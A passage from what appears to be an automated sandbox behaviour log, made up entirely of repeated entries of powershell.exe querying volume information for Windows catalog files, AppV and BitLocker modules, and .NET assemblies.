                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
